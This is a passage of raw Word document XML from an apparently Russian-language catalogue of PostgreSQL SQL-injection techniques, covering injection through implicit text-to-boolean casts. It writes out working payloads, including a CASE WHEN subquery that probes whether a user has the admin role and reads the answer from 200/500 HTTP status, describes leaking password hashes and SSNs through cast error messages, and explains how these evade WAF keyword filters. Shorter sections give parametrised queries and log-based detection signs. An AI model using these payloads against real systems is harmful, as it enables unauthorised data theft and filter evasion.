                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>'YES'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> / etc.</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BEE2EB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>true (case-insensitive)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6F1DB907" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sanitizer, который блокирует только </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'true'</w:t>
      </w:r>
      <w:r>
        <w:t>, наивен. Полный фильтр требует регистронезависимого блокирования всех 12+ литералов плюс whitespace-вариантов (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'  true  '</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → cast c trim-ом → true). Реальные WAF этого не делают.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6250275E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload C — short-circuit boolean-channel oracle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38033BA8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Контекст: error-based blokirovan (catch-all 500 в приложении не возвращает текст ошибки клиенту). Но HTTP-status-разделение работает: 200 vs 500.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F147532" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Уязвимый запрос:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE0DED8"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is_active = '&lt;is_active&gt;' AND id = 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D20307" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>AND</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в PG </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не гарантирует</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> left-to-right evaluation. Планировщик может выбрать порядок. Но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>invalid-boolean-cast</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — это runtime exception, который пробрасывается вверх по дереву execution, прерывая весь statement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ACACF13" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Payload A — leak через timing of error:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5176FA32" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>case when (select role='admin' from users where id=1) then 't' else 'invalid_bool_lol' end</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C693863" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что в результате доходит до сервера:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA52134"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is_active = case when (select role='admin' from users where id=1) then 't' else 'invalid_bool_lol' end AND id = 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F7AFAB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Если </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>role='admin'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — CASE вычисляется в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'t'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, cast проходит, дальше </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>id=1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — статус 200 (или 404 если нет такого user, но без exception).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711AFC8C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Если </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>role != 'admin'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — CASE вычисляется в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'invalid_bool_lol'</w:t>
      </w:r>
      <w:r>
        <w:t>, cast падает с exception → 500.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3357875D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Атакующий читает boolean answer по HTTP-status, без видения текста ошибки. Это классический boolean-blind (3.3), но через BOOLEAN-cast-channel — добавочный oracle поверх обычных тавтологий.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF0C20B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Преимущество перед 3.3 (boolean-blind через тавтологию </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OR 1=1</w:t>
      </w:r>
      <w:r>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1250EFDF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   WAF, который блокирует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OR\s+1\s*=\s*1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (3.9.0), не покрывает CASE-через-cast-error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460F099D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   BOOLEAN cast-error даёт более жёсткий 500 status (vs 200/200-differ в обычном boolean-blind), что упрощает автоматизацию sqlmap-уровня tools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F0B070" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Что произойдёт</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31ADA1D0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload A</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — leak password hash, ssn, internal data через текст error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D257C54" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload B</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — обход naive bool-sanitizer; tautology </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'yes'='on'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> приводит к универсальному match.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521FA590" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload C</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — boolean-oracle через 200/500 HTTP-status без видимого error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231F79AE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Почему этот приём проходит фильтр</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098BBF10" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cast `::boolean`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — implicit, пишется кодом приложения, не приходит из payload. WAF не может его блокировать (это не строка в запросе атакующего).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512D7ACA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sanitizer на ключевые слова (`true`, `false`, `1=1`)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — не покрывает альтернативные bool-литералы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58CC7724" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Error-based via INT-cast (3.2.1)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> часто в WAF blacklist (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\b::int\b</w:t>
      </w:r>
      <w:r>
        <w:t>); error-based via BOOLEAN — нет: bool-cast выглядит как обычное сравнение в WHERE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37037F2A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Почему PostgreSQL принимает результат как валидный SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3234FE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>text→boolean coercion</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — implicit, документирована: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE CAST (text AS boolean)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> встроен в core. Список принимаемых литералов — в https://www.postgresql.org/docs/current/datatype-boolean.html.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D27B9BB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Coercion happens at execution time</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, не plan-time. Поэтому </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT '&lt;dynamic&gt;'::boolean</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE bool_col = '&lt;dynamic&gt;'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> бросает ошибку </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>во время</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> выполнения, что попадает в exception-handler приложения.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080D2363" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Error-сообщение содержит точное invalid-значение</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — это часть PG error-handling philosophy (помогать разработчику видеть, что было). В application-context — leak.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B134861" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Conditional evaluation `CASE WHEN ... THEN ... ELSE ... END`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — гарантированно вычисляет только одну ветку (документировано); это исключение из общего правила «PG не гарантирует evaluation order операндов».</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCCB304" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Требования к среде</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20FC6B02" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PostgreSQL 7.x+</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>BOOLEAN</w:t>
      </w:r>
      <w:r>
        <w:t>-тип в PG с самого начала, coercion-правила стабильны.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA1FB4E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Привилегии</w:t>
      </w:r>
      <w:r>
        <w:t>: PUBLIC. SELECT на target table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77328F10" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Колонка BOOLEAN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в WHERE-сравнении с user-input в text-форме.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A74DB3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Application-error пробрасывается в HTTP-ответ</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для Payload A. Для Payload C достаточно 500-status.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525CB3A7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Managed</w:t>
      </w:r>
      <w:r>
        <w:t>: работает идентично. Cast-правила — core PG.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4964EF86" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Как выглядит легитимное использование</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4045CA10" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE active = $1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> через параметризацию (bind value автоматически cast-ится при типизировании target column) — стандартно.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50658E3F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Атака отличается:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630ED6D5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Текст error содержит длинные подстроки</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (&gt;50 символов, hash-like, base64-like) → почти всегда leak attempt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B54A250" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`pg_stat_statements`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> запись </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT * FROM users WHERE is_active = '...' || (SELECT ...)::text</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — конкатенация в WHERE-bool-comparison, нелегитимная для production-кода (там просто bind value).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E3B759" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTP-error pattern</w:t>
      </w:r>
      <w:r>
        <w:t>: одинаковые 500 ошибки в логах web-сервера с тем же endpoint, но разными query-string — boolean-blind через cast.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FD9478" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`CASE WHEN ... THEN 't' ELSE 'invalid_x' END`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в логах — explicit oracle-маркер.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75358FD7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Версии</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DC198D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PostgreSQL 7.x – 17</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (все поддерживаемые).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CD062B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Managed</w:t>
      </w:r>
      <w:r>
        <w:t>: работает идентично.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0472988F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Связанные паттерны</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B536005" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.2 (Error-based)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — общий класс. 3.11.1 — отдельный channel через BOOLEAN-cast; механика идентична.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089770E4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.3 (Boolean-based blind)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — Payload C — альтернативный oracle через cast-error вместо tautology.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D2A2D6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.9.6 (Whitespace tricks)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — bool-literals принимаются с whitespace (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
